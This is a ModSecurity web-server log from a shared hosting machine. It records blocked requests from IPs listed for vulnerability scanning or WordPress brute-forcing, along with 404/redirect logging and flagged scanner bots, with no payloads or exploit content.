[Tue May 26 16:43:14.814562 2026] [security2:error] [pid 823496:tid 823626] [remote 216.73.216.30:33673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWASpa08mrtyBNpA4PKFAAAGX8"]
[Tue May 26 16:43:15.357528 2026] [security2:error] [pid 823496:tid 823536] [remote 216.73.216.30:33673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWAS5a08mrtyBNpA4PKIAAAGSU"]
[Tue May 26 16:43:15.530430 2026] [security2:error] [pid 823496:tid 823737] [client 117.198.37.168:56860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAS5a08mrtyBNpA4PKJgAAAG0"]
[Tue May 26 16:43:15.530609 2026] [security2:error] [pid 823496:tid 823737] [client 117.198.37.168:56860] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAS5a08mrtyBNpA4PKJgAAAG0"]
[Tue May 26 16:43:17.388494 2026] [security2:error] [pid 823496:tid 823744] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWASpa08mrtyBNpA4PKCAAAAHQ"]
[Tue May 26 16:43:17.531678 2026] [security2:error] [pid 823496:tid 823563] [remote 216.73.216.30:33673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWATZa08mrtyBNpA4PKPgAAGUA"]
[Tue May 26 16:43:17.720885 2026] [security2:error] [pid 823496:tid 823562] [remote 216.73.216.30:33673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWATZa08mrtyBNpA4PKPwAAGT8"]
[Tue May 26 16:43:17.903964 2026] [security2:error] [pid 823496:tid 823518] [remote 216.73.216.30:33673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWATZa08mrtyBNpA4PKRAAAGRM"]
[Tue May 26 16:43:18.085221 2026] [security2:error] [pid 823496:tid 823522] [remote 216.73.216.30:33673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWATpa08mrtyBNpA4PKRQAAGRc"]
[Tue May 26 16:43:18.266039 2026] [security2:error] [pid 823496:tid 823578] [remote 216.73.216.30:33673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWATpa08mrtyBNpA4PKSgAAGU8"]
[Tue May 26 16:43:18.447002 2026] [security2:error] [pid 823496:tid 823564] [remote 216.73.216.30:33673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWATpa08mrtyBNpA4PKSwAAGUE"]
[Tue May 26 16:43:18.808685 2026] [security2:error] [pid 823496:tid 823700] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWATJa08mrtyBNpA4PKMQAAAEg"]
[Tue May 26 16:43:18.990337 2026] [security2:error] [pid 823496:tid 823567] [remote 216.73.216.30:33673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWATpa08mrtyBNpA4PKTgAAGUQ"]
[Tue May 26 16:43:20.272124 2026] [security2:error] [pid 817651:tid 817822] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWATtlGRCPPN1dS2y2uWgAAAK4"]
[Tue May 26 16:43:20.922937 2026] [security2:error] [pid 817651:tid 817815] [client 62.60.130.233:55843] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kmmc.co.in"] [uri "/wp-login.php"] [unique_id "ahWAUNlGRCPPN1dS2y2udwAAAKc"], referer: https://duckduckgo.com/
[Tue May 26 16:43:21.262372 2026] [security2:error] [pid 817651:tid 817781] [client 62.60.130.233:63717] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kmmc.co.in"] [uri "/wp-login.php"] [unique_id "ahWAUdlGRCPPN1dS2y2uewAAAIU"]
[Tue May 26 16:43:21.658796 2026] [security2:error] [pid 817651:tid 817804] [client 14.188.157.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWATtlGRCPPN1dS2y2uagAAAJw"]
[Tue May 26 16:43:22.072941 2026] [security2:error] [pid 817651:tid 817825] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAT9lGRCPPN1dS2y2ucAAAALE"]
[Tue May 26 16:43:22.860085 2026] [security2:error] [pid 817651:tid 817847] [client 45.148.10.204:54948] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUtlGRCPPN1dS2y2ukgAAAMc"]
[Tue May 26 16:43:22.872332 2026] [security2:error] [pid 823496:tid 823675] [client 45.148.10.204:54932] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKZgAAAC8"]
[Tue May 26 16:43:22.877364 2026] [security2:error] [pid 823496:tid 823671] [client 45.148.10.204:54956] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKZwAAACs"]
[Tue May 26 16:43:22.881545 2026] [security2:error] [pid 823496:tid 823734] [client 45.148.10.204:54952] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKaAAAAGo"]
[Tue May 26 16:43:22.891240 2026] [security2:error] [pid 817651:tid 817786] [client 45.148.10.204:54968] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUtlGRCPPN1dS2y2ukwAAAIo"]
[Tue May 26 16:43:22.894407 2026] [security2:error] [pid 823496:tid 823696] [client 45.148.10.204:54974] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKaQAAAEQ"]
[Tue May 26 16:43:22.901126 2026] [security2:error] [pid 817651:tid 817784] [client 45.148.10.204:54994] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUtlGRCPPN1dS2y2ulAAAAIg"]
[Tue May 26 16:43:22.906724 2026] [security2:error] [pid 823496:tid 823674] [client 45.148.10.204:54980] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKagAAAC4"]
[Tue May 26 16:43:22.919321 2026] [security2:error] [pid 823496:tid 823667] [client 45.148.10.204:55006] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKbAAAACc"]
[Tue May 26 16:43:22.921514 2026] [security2:error] [pid 823496:tid 823705] [client 45.148.10.204:55014] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKawAAAE0"]
[Tue May 26 16:43:22.926943 2026] [security2:error] [pid 823496:tid 823688] [client 45.148.10.204:55050] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKbwAAADw"]
[Tue May 26 16:43:22.929631 2026] [security2:error] [pid 823496:tid 823634] [client 45.148.10.204:55024] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKbQAAAAY"]
[Tue May 26 16:43:22.938756 2026] [security2:error] [pid 823496:tid 823708] [client 45.148.10.204:55030] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKbgAAAFA"]
[Tue May 26 16:43:22.941463 2026] [security2:error] [pid 823496:tid 823684] [client 45.148.10.204:55052] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKcAAAADg"]
[Tue May 26 16:43:22.949527 2026] [security2:error] [pid 823496:tid 823650] [client 45.148.10.204:55062] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKcQAAABY"]
[Tue May 26 16:43:22.949686 2026] [security2:error] [pid 817651:tid 817844] [client 45.148.10.204:55046] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUtlGRCPPN1dS2y2ulQAAAMQ"]
[Tue May 26 16:43:22.964037 2026] [security2:error] [pid 823496:tid 823641] [client 45.148.10.204:55078] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKcgAAAA0"]
[Tue May 26 16:43:22.970830 2026] [security2:error] [pid 817651:tid 817807] [client 45.148.10.204:55104] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUtlGRCPPN1dS2y2ulgAAAJ8"]
[Tue May 26 16:43:22.979739 2026] [security2:error] [pid 823496:tid 823676] [client 45.148.10.204:55090] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKdAAAADA"]
[Tue May 26 16:43:22.991546 2026] [security2:error] [pid 823496:tid 823642] [client 45.148.10.204:55126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKdQAAAA4"]
[Tue May 26 16:43:22.991748 2026] [security2:error] [pid 823496:tid 823715] [client 45.148.10.204:55116] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKdwAAAFc"]
[Tue May 26 16:43:22.996068 2026] [security2:error] [pid 823496:tid 823730] [client 45.148.10.204:55140] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKdgAAAGY"]
[Tue May 26 16:43:23.005643 2026] [security2:error] [pid 817651:tid 817881] [client 45.148.10.204:55174] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUtlGRCPPN1dS2y2umwAAAOk"]
[Tue May 26 16:43:23.006667 2026] [security2:error] [pid 817651:tid 817805] [client 45.148.10.204:55176] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUtlGRCPPN1dS2y2umQAAAJ0"]
[Tue May 26 16:43:23.007745 2026] [security2:error] [pid 817651:tid 817908] [client 45.148.10.204:55146] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUtlGRCPPN1dS2y2umAAAAQQ"]
[Tue May 26 16:43:23.009596 2026] [security2:error] [pid 817651:tid 817838] [client 45.148.10.204:55152] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUtlGRCPPN1dS2y2umgAAAL4"]
[Tue May 26 16:43:23.011732 2026] [security2:error] [pid 817651:tid 817819] [client 45.148.10.204:55158] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUtlGRCPPN1dS2y2unAAAAKs"]
[Tue May 26 16:43:23.014692 2026] [security2:error] [pid 817651:tid 817833] [client 45.148.10.204:55168] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUtlGRCPPN1dS2y2ulwAAALk"]
[Tue May 26 16:43:23.059790 2026] [security2:error] [pid 817651:tid 817890] [client 45.148.10.204:55178] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAUtlGRCPPN1dS2y2unQAAAPI"]
[Tue May 26 16:43:23.142292 2026] [security2:error] [pid 817651:tid 817803] [client 45.148.10.204:55182] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAU9lGRCPPN1dS2y2upAAAAJs"]
[Tue May 26 16:43:23.160256 2026] [security2:error] [pid 817651:tid 817796] [client 45.148.10.204:55184] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAU9lGRCPPN1dS2y2upQAAAJQ"]
[Tue May 26 16:43:23.879194 2026] [security2:error] [pid 823496:tid 823702] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAUpa08mrtyBNpA4PKYgAAAEo"]
[Tue May 26 16:43:23.991477 2026] [security2:error] [pid 823496:tid 823547] [remote 216.73.216.30:33673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWAU5a08mrtyBNpA4PKkwAAITA"]
[Tue May 26 16:43:25.449153 2026] [security2:error] [pid 823496:tid 823663] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAVJa08mrtyBNpA4PKlwAAACM"]
[Tue May 26 16:43:26.032082 2026] [security2:error] [pid 817651:tid 817787] [client 117.198.37.168:57182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAVtlGRCPPN1dS2y2uvAAAAIs"]
[Tue May 26 16:43:26.032234 2026] [security2:error] [pid 817651:tid 817787] [client 117.198.37.168:57182] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAVtlGRCPPN1dS2y2uvAAAAIs"]
[Tue May 26 16:43:27.236332 2026] [security2:error] [pid 817651:tid 817837] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAVtlGRCPPN1dS2y2uxAAAAL0"]
[Tue May 26 16:43:28.797696 2026] [security2:error] [pid 817651:tid 817863] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAWNlGRCPPN1dS2y2u0wAAANc"]
[Tue May 26 16:43:29.246143 2026] [security2:error] [pid 823496:tid 823588] [remote 216.73.216.30:19590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWAWZa08mrtyBNpA4PK1gAARlk"]
[Tue May 26 16:43:30.728743 2026] [security2:error] [pid 817651:tid 817884] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAWdlGRCPPN1dS2y2u3AAAAOw"]
[Tue May 26 16:43:31.088252 2026] [security2:error] [pid 817651:tid 817822] [client 208.91.198.85:47062] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahWAWtlGRCPPN1dS2y2u4AAAAK4"]
[Tue May 26 16:43:32.952738 2026] [security2:error] [pid 823496:tid 823722] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAXJa08mrtyBNpA4PK_gAAAF4"]
[Tue May 26 16:43:33.680269 2026] [security2:error] [pid 817651:tid 817810] [client 130.131.162.82:51624] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.198.65"] [uri "/index.cgi"] [unique_id "ahWAXdlGRCPPN1dS2y2u9QAAAKI"]
[Tue May 26 16:43:34.002162 2026] [security2:error] [pid 823496:tid 823575] [remote 216.73.216.30:19590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWAXpa08mrtyBNpA4PLEQAAREw"]
[Tue May 26 16:43:34.822576 2026] [security2:error] [pid 823496:tid 823675] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAXpa08mrtyBNpA4PLFAAAAC8"]
[Tue May 26 16:43:36.739520 2026] [security2:error] [pid 823496:tid 823723] [client 117.198.37.168:57508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAYJa08mrtyBNpA4PLOwAAAF8"]
[Tue May 26 16:43:36.739692 2026] [security2:error] [pid 823496:tid 823723] [client 117.198.37.168:57508] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAYJa08mrtyBNpA4PLOwAAAF8"]
[Tue May 26 16:43:37.009539 2026] [security2:error] [pid 817651:tid 817803] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAYNlGRCPPN1dS2y2vHgAAAJs"]
[Tue May 26 16:43:37.286577 2026] [security2:error] [pid 823496:tid 823738] [client 107.189.8.70:36248] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahWAYJa08mrtyBNpA4PLOAAAAG4"]
[Tue May 26 16:43:38.863894 2026] [security2:error] [pid 817651:tid 817831] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAYtlGRCPPN1dS2y2vKAAAALc"]
[Tue May 26 16:43:38.935977 2026] [security2:error] [pid 817651:tid 817892] [client 130.131.162.82:51628] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "208.91.198.65"] [uri "/cgi-sys/404.html"] [unique_id "ahWAYtlGRCPPN1dS2y2vMAAAAPQ"], referer: https://208.91.198.65/
